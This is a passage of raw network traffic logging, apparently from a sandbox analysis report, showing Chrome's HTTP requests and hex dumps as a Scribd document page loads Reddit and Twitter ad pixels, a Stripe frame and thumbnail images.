                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC868INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 86
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                        cache-control: max-age=300
                                                                                                                                                                                                                                                                                                                                                                                        content-type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding,Origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: snooserv
                                                                                                                                                                                                                                                                                                                                                                                        Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                                                                                                                                                                                                                        NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.02, "failure_fraction": 0.02}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC86INData Raw: 7b 22 76 65 72 73 69 6f 6e 5f 68 61 73 68 22 3a 22 34 39 32 36 37 62 63 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 64 64 69 74 73 74 61 74 69 63 2e 63 6f 6d 2f 61 64 73 2f 34 39 32 36 37 62 63 65 2f 70 69 78 65 6c 2e 6a 73 22 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"version_hash":"49267bce","url":"https://www.redditstatic.com/ads/49267bce/pixel.js"}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        89192.168.2.1649831151.101.1.1404436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC372OUTGET /pixels/t2_9t33vcn2/config HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: pixel-config.reddit.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC253INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 27
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC27INData Raw: 1f 8b 08 00 00 00 00 00 00 ff aa ae e5 02 04 00 00 ff ff 06 b0 a1 dd 03 00 00 00
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        90192.168.2.1649830162.159.140.2294436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1088OUTGET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=b1114f61-c277-4039-98e0-e4f4bd727b42&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=fee98000-b35d-4415-8e95-c2af9a8a4149&tw_document_href=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nzbvs&type=javascript&version=2.3.31 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: t.co
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC882INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 43
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        perf: 7402827104
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: muc_ads=2483231b-cc38-466c-aba5-a253066bdc53; Max-Age=63072000; Expires=Sun, 06 Dec 2026 21:59:38 GMT; Path=/; Domain=t.co; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                                        x-transaction-id: f506284adc5baa60
                                                                                                                                                                                                                                                                                                                                                                                        strict-transport-security: max-age=0
                                                                                                                                                                                                                                                                                                                                                                                        x-response-time: 66
                                                                                                                                                                                                                                                                                                                                                                                        x-connection-hash: bef2fea091a2542916b6c4eeb47260367a51d59a2827d1845c0be8fde25b7615
                                                                                                                                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: __cf_bm=chNrjQ8Lch28S5lOa3Si64I9cftb.x6ifHyJn0JddKQ-1733522378-1.0.1.1-oGj2RIBts1knJnzL5Xn6qILftQDpAz.5kkPSQytfx7H07LNbgaUBPATZrDPgtwu2UeKOzEpUcVJkwu9i0_rGOg; path=/; expires=Fri, 06-Dec-24 22:29:38 GMT; domain=.t.co; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                                        Server: cloudflare tsa_b
                                                                                                                                                                                                                                                                                                                                                                                        CF-RAY: 8edf8b4fc86732e8-EWR
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 09 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        91192.168.2.164982852.222.144.584436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC686OUTGET /inner.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: m.stripe.network
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://js.stripe.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1209INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 930
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 05 Dec 2024 23:02:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Server: Cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=300, public
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "f5eaddb4dfc7e121aba2112e1ca3ef2d"
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 633fece295fcb199456ab86aeffd3b00.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                                        Age: 133
                                                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: base-uri 'none'; connect-src https://m.stripe.network https://m.stripe.com; default-src 'none'; font-src https://m.stripe.network https://fonts.gstatic.com; form-action 'none'; frame-src https://m.stripe.network https://js.stripe.com; img-src https://m.stripe.network https://m.stripe.com https://b.stripecdn.com; script-src https://m.stripe.network 'sha256-5DA+a07wxWmEka9IdoWjSPVHb17Cp5284/lJzfbl8KA=' 'sha256-/5Guo2nzv5n/w6ukZpOBZOtTJBJPSkJ6mhHpnBgm3Ls='; style-src https://m.stripe.network; report-uri https://q.stripe.com/csp-report
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: MRS52-C2
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: QQj_R0rIiwaRYN9qnHclyyK42bpw-3hzBcM3O9i4AK9eiH38Td_aew==
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC930INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 74 72 69 70 65 4d 2d 49 6e 6e 65 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 64 65 66 65 72 3d 21 30 2c 65 2e 73 72 63 3d 22 6f 75 74 2d 34 2e 35 2e 34 34 2e 6a 73 22 2c 65 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 77 69 6e 64 6f 77 2e 53 74 72 69 70 65 4d 26 26 28 65 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2c 2f 70 69 6e 67 3d 66
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8"><title>StripeM-Inner</title></head><body><script>!function(){var e=document.createElement("script");e.defer=!0,e.src="out-4.5.44.js",e.onload=function(){var e;window.StripeM&&(e=window.location.hash,/ping=f


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        92192.168.2.1649834151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC645OUTGET /img/word_document/310560108/149x198/44055ac324/1733356526?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC777INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 7946
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "N5LDxEZQ3539dJhT0WqJwPL50XwXforPFF1+4fpC7jA"
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Info: ifsz=19584 idim=149x198 ifmt=png ofsz=7946 odim=149x198 ofmt=webp
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Served-By: vpop-kiad7010226
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Stats: io=1
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 85
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 165851
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100104-CHI, cache-nyc-kteb1890088-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 21, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522378.380568,VS0,VE2
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: 52 49 46 46 02 1f 00 00 57 45 42 50 56 50 38 20 f6 1e 00 00 10 65 00 9d 01 2a 95 00 c6 00 3e 6d 2a 92 45 a4 22 a1 a1 31 38 ab 50 80 0d 89 6c 00 cd f4 7c 0a 07 cf 79 b6 d8 df c6 ff 72 fd 83 c3 46 5b bb 5b fe b7 de 57 ce 1f f3 df f4 bd 88 fe 7d ff ad ee 01 fa c9 ff 0f a8 af ee 37 a8 4f d9 ef d9 5f 77 5f f3 bf b2 7e e5 3f bc 7f 96 fd 91 f8 06 fe 91 fe 03 d6 57 fe 37 ff ff 72 9f eb bf eb bf f6 fb 8e 7f 44 ff 3b ff df d7 5b f7 17 e1 4b fb 7f fc 6f dc 0f 6b 8f ff fe c0 1f ff fd b5 ba 53 fa e5 fd 9b b6 bf f4 3e 14 f8 95 f4 47 ed bf b5 df 93 bf 20 1f de f8 17 e9 5f f8 fe 86 7f 33 fb e5 fb 4f ef 5f ba 3f dc 7d b8 ff 47 f6 ef e8 ff c5 5f f1 3d 40 bd 7b fe 9b c5 67 68 96 d3 fe 9f d0 17 d8 6f a7 ff c0 ff 17 f9 2d e8 b1 fe 57 f8 7f 53 fe be ff b6 f7 00 fe 67 fd 7f fe
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RIFFWEBPVP8 e*>m*E"18Pl|yrF[[W}7O_w_~?W7rD;[KokS>G _3O_?}G_=@{gho-WSg
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: 21 f7 3a 46 70 16 32 19 d2 c4 5d fe 3a c3 71 d9 0f 78 6d 68 f1 22 19 67 a3 cc ed 20 1d 11 4f 2c 57 e3 aa a6 1c 20 5c ea 55 4c c6 35 c0 7f a0 65 7f 6b cc a6 cf 66 d8 cc 22 87 fb 7d f7 b8 e4 e0 37 b4 1e 00 e9 dd 2e e9 28 10 f1 e7 a0 68 55 f7 4e 32 31 d0 6c 47 f7 8c e4 7a a5 94 dc 0a b5 d7 26 96 f2 d4 63 4b dd 4d 6f ef 77 dc 01 d7 40 98 fb 99 57 0d 54 07 f2 76 4f 4c 6d 39 47 dc 9e ef 60 51 3c a2 ca 22 a7 9d 7e dd dc 97 42 9b a6 c4 56 85 bc a4 c4 a6 11 89 ca bc 81 e2 5e 9b 78 85 f4 4c 93 98 4f c7 b5 cb 8a 76 36 ed 46 29 a4 8f 36 a6 12 c6 53 cd 6c 25 90 6b 27 4d 05 94 55 c1 5d d1 cc fc f6 bc cd 84 4a 88 21 5f 91 c9 1a 46 ce 4e d8 db 17 ab 21 58 e7 46 bb 82 0b 86 3f ef 0d 07 37 87 2b 8d be 5d 7b f8 6f 6a fe 7f ff c4 4a dd 5e 87 ed d8 99 28 68 b8 53 d4 3d 39 7f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !:Fp2]:qxmh"g O,W \UL5ekf"}7.(hUN21lGz&cKMow@WTvOLm9G`Q<"~BV^xLOv6F)6Sl%k'MU]J!_FN!XF?7+]{ojJ^(hS=9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: c7 07 e4 38 f1 e3 90 23 0b 09 a9 3e 22 fb 95 43 ad 3a e4 7b 7d 60 36 46 26 20 7d 5f 63 c9 aa 62 b2 5c 7a 00 f6 c7 c6 b5 b1 82 fe 9b 57 cd 4c 36 58 f0 3c 46 36 4a 25 6d e9 04 10 11 e5 0a fe 55 b8 1e 97 8e 6b 6e aa b7 5e d8 9f 49 35 75 44 9a 6a b9 2a d2 5f 6b 5d 06 3c 9c 9e 5d 77 6b d6 66 4a 6b d6 75 3e 6e fc 70 89 b3 54 4c f4 8f 3c 32 ce 23 e9 50 4a 20 49 a4 b3 a7 ec b0 71 81 93 6c ed e0 a8 03 b5 91 c3 b0 dc d5 7e f5 8e 8c c4 6d 17 17 0b cd 90 ea 47 f1 36 2f b1 dd bf d2 33 3e 17 7c 81 99 4a 73 be 05 98 96 46 9e a9 75 b7 48 0f 68 db 4a 28 fe b6 95 bc f7 79 3b 80 77 76 cf 7e 94 3e 10 e6 af 0b ce cf d1 18 04 e5 8c 0d ab 8f d1 36 e2 0b 11 88 d0 ce 7b 1f 6b 35 0e 75 b9 3e 5f 5f 7a d3 01 27 f3 90 01 d7 f6 27 12 11 59 94 56 6e 6d a2 68 a7 f3 bc 14 f6 c3 06 20 8c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 8#>"C:{}`6F& }_cb\zWL6X<F6J%mUkn^I5uDj*_k]<]wkfJku>npTL<2#PJ Iql~mG6/3>|JsFuHhJ(y;wv~>6{k5u>__z''YVnmh
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: e5 8f 52 f6 5b 67 c7 5d 89 19 a9 83 af 63 14 be 9c 30 ce da 37 f7 76 3e 6c 47 b8 3b a9 f8 a5 d1 6f df 74 dc 84 61 aa 19 32 08 24 42 e8 c7 34 d3 62 3d fe 25 cc 2e cd 06 2c 09 c2 2b 58 15 c5 e3 80 71 7e d7 40 4e 67 2e 61 a1 0d 3a 19 66 51 ed 0c 52 98 7d b6 be 3d ab be 01 4a ef c1 60 bc 54 9a 0f 19 aa 89 d9 a7 6d d3 0e 91 d0 fc 6f 82 31 eb 8d aa 81 2b 33 91 6d f9 ab 72 1c 3b ce 0d a9 91 20 61 3d 94 cd 7a be 4e 05 15 d7 16 27 bb 85 2d 36 d6 c2 eb 57 79 13 31 81 1d 74 da 92 a4 6c df 53 e4 dc c3 45 0b b4 73 2f 61 a0 a1 d0 df 35 3b c9 f8 a3 0d 02 5e 89 d8 3b 4d a5 d3 39 dd 76 b5 c2 ee 03 96 ea be f5 1f 99 55 bf 12 96 7f 52 94 ed d3 b7 b3 f3 ae ab 01 63 a7 77 4f e6 61 fd 41 f3 63 93 42 7c 2d dc 11 49 fe 1d 5a 16 83 38 62 58 90 c8 74 fb f2 0f b8 ca 09 a6 49 e7 79
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: R[g]c07v>lG;ota2$B4b=%.,+Xq~@Ng.a:fQR}=J`Tmo1+3mr; a=zN'-6Wy1tlSEs/a5;^;M9vURcwOaAcB|-IZ8bXtIy
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: ac d0 55 e4 bf 35 9b 33 61 f2 f3 35 82 fd 53 6d 3d 26 98 dc 8a 6d 21 71 33 9a 91 5b 28 2c 65 fd 4a b5 07 e5 a4 e6 8c ed e4 96 a5 ea 9f ea 37 ed e0 59 5a b8 13 a1 09 b7 15 7c 07 8e 20 de 97 a5 f8 95 ef de 21 37 9a 15 88 15 ca dd 1b bd 83 9b 37 ab 96 c4 33 77 7c c5 ad ff e0 38 61 61 ff 61 24 a2 ba 1a 7f 6f 06 ca fe 50 2d 16 90 b8 0b 6f f9 c6 30 d6 67 51 7f fe 58 dc f4 fd ad 9f 92 4d 46 79 ae fc f9 f8 ff 0b 0e 49 c2 7e 18 c9 58 9c f8 23 2c 91 5a b6 bd 5d 90 4d a0 49 5e 79 51 2f b6 b0 2b f9 09 36 a1 c0 22 22 7f ac 6e 00 f7 fd 94 09 7b 5f da 6c 24 20 34 da 92 4d 46 6f c8 4a 67 1e 1b 8f 7d 9b d0 76 16 f9 54 85 4d f4 8d 10 4c 70 ef c6 0e 4c 66 af 08 dc cd 5e 04 00 b1 7f 7c d9 1a c6 df 50 1f 05 48 f3 5c b4 07 42 3a b4 62 96 c2 13 03 8d 69 ad cf fd 8b 08 6d 8a 59
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: U53a5Sm=&m!q3[(,eJ7YZ| !773w|8aaa$oP-o0gQXMFyI~X#,Z]MI^yQ/+6""n{_l$ 4MFoJg}vTMLpLf^|PH\B:bimY
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1056INData Raw: d5 2f b3 ef 3d d9 f4 09 97 2b 0c 72 fd 94 58 8f 55 be 78 d2 d0 66 60 df b1 71 71 2f 92 21 b6 2f c7 db 8a 37 3a f9 9d 4c 72 be 41 75 e4 37 96 eb 68 2d 56 25 3d aa ae 02 be 38 73 68 13 db 6c f8 eb 45 81 1a 54 3d 17 3d bd 29 9c b5 b0 9b 4b 41 f0 df 37 f0 85 16 b4 cc 2b fb d1 75 5b ea 25 fa 72 bb cf 78 c7 28 ca 31 27 89 77 2c 6a c4 f9 c4 ee 34 7d 88 f3 ec ec bf 61 fe 5e b7 d4 f2 15 10 b8 83 54 7e e5 1d 75 55 2a 54 88 af 32 56 a2 80 eb ab d6 de 3c 23 2b 4e a5 bd 2f d2 83 0a a0 b0 ac 4c 49 a1 55 ff dd a5 5a 25 7c 18 94 88 88 16 42 09 b0 fa 6b ab 8e cb 78 52 90 a7 68 3c de c7 b6 ba b5 b9 7e 9b 8d 17 10 d8 3f d1 92 07 e8 57 7e d8 14 5e d0 0b c2 4e a3 ec 9e f8 c3 fe 17 4e 9a e1 f5 55 c0 a2 22 a2 0e 90 44 b6 8f d5 21 48 73 8f d4 b2 d8 3e 41 cb 9e 16 a4 8b 3b d4 20
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /=+rXUxf`qq/!/7:LrAu7h-V%=8shlET==)KA7+u[%rx(1'w,j4}a^T~uU*T2V<#+N/LIUZ%|BkxRh<~?W~^NNU"D!Hs>A;


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        93192.168.2.1649836151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC645OUTGET /img/word_document/224410406/149x198/b245e05319/1731318738?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
